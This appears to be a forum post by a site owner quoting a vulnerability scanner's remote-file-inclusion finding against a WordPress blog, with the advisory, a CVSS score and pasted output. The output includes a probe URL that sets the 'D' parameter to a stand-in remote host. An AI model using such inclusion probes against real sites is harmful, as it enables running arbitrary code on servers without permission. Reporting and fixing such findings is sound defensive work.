-
My host states the WPS is injectable at the D parameter and the remote CGI is able to run scripts because there is not proper sanitizing using the HTTP method. Quote:The remote web server hosts cgi scripts that fail to adequately sanitize request strings. By
leveraging this issue, an attacker may be able to include a remote file from a remote server and
execute arbitrary commands on the target host.
High / CVSS Base Score : 7.5 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)
Restrict access to the vulnerable application. Contact the vendor
for a patch or upgrade.
output
[…] includes%3A+safety%2C+saving+money%2C+eco-friendly%2C+speed%2C+and+more+convenience…Will+you+choose+to+MAD%3F+It+is+time+to+Make+A+Difference.%0D%0A%0D%0A%0D%0AStatistics%0D%0ADo+you+want+to+become+a+statistic%3F+Read+and+decide+if+you+are+already+a+stat%20-%20http://mommasmoneymatters.com/mad-bill-pay/?D=http://w2DCfiZo.example.com/” title=”Email this” target=”_blank” rel=”nofollow”class=”wp-socializer-single”>
